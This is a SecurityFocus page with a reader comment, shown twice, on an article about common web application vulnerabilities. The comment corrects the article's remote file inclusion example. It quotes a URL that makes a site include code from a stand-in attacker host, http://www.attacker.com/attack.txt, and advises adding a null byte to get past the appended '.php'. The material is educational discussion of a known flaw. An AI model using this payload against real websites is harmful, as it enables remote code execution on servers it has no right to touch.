Threat level definition
Search:
Home
Bugtraq
Vulnerabilities
Mailing Lists
Jobs
Tools
Vista
News
Infocus
Foundations
Microsoft
Unix
IDS
Incidents
Virus
Pen-Test
Firewalls
Columnists
Mailing Lists
Newsletters
Bugtraq
Focus on IDS
Focus on Linux
Focus on Microsoft
Forensics
Pen-test
Security Basics
Vuln Dev
Vulnerabilities
Jobs
Job Opportunities
Resumes
Job Seekers
Employers
Tools
RSS
News
Vulns
Security Research
Five common Web application vulnerabilities
Sumit Siddharth, Pratiksha Doshi
Submit Comment
Mode:
Threaded
Flat
Name:
Subject:
Message:
Enter the characters that appear above
Five common Web application vulnerabilities
2006-05-09
Anonymous
There is a typo:
http://www.vulnsite.com/index.php?page=http://www.attacker.com/attack.txt
that is not the proper exploit to leverage this hole:
require ($page . ".php");
becase of the ".php"
you need to end the attacker's url with a hexed null byte %00 like this:
http://www.vulnsite.com/inde...
[ more ]
Privacy Statement
Copyright 2008, SecurityFocus
Anonymous
http://www.vulnsite.com/index.php?page=http://www.attacker.com/attack.txt
that is not the proper exploit to leverage this hole:
require ($page . ".php");
becase of the ".php"
you need to end the attacker's url with a hexed null byte %00 like this:
http://www.vulnsite.com/inde...
[ more ]